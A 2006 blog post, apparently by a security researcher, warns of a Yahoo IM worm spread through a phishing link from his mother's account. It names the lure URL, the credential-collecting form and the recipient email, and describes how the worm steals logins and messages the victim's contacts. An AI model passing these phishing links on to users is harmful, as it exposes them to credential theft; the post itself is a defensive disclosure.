New Yahoo IM Malware/Worm (Mom, how could you!)

Dave G. | June 7th, 2006 | Filed Under: New Findings

So, I log into Yahoo IM today, and I get this from my mother:

:) http://www.geocities.com/lots_of_hot_pics_of_me/ :)

Now, I know my mother. I know she would not send this URL to me. The obvious question is, what if this was meant for someone else (my father, i would hope!). I confirm that, in fact, my mother does not take suggestive pictures and post them on the Internet.

Looks like a piece of malware that:


  1. steals credentials via that geocities URL (DONT GO THERE)
  2. sends it to: http://www2.fiberbit.net/form/mailto.cgi
  3. who mails it to “slims.box@gmail.com”
  4. redirects the user to their own Yahoo Photo’s page
  5. logs into Yahoo IM as the unfortunate sap
  6. sends the URL to everyone on their buddy list

I am sure it does more than that. Heads up.

4 Comments so far

  • Spandau Ballet

    June 8th, 2006 2:08 am

    The geocities URL is no longer in production. I just got a 403 from the server, which means one of two things:

    1) Either the geocities administrators have responded to a potential worm, or…
    2) Dave’s mom knows how to party and should add me to her buddy list.

    I’m really hoping for #2. If she is in the habit of clicking on random porno links, then this actually could be possible.

  • Randy

    September 16th, 2006 10:49 pm

    This is still alive and well. I just got nabbed by it this weekend, so Yahoo and Geocities have done nothing very serious about getting rid of the problem.

  • Dave G.

    September 17th, 2006 11:05 pm

    Randy:

    With the same URLs?

  • anissia

    September 18th, 2006 12:14 pm

    umm , ok .

    • Leave a reply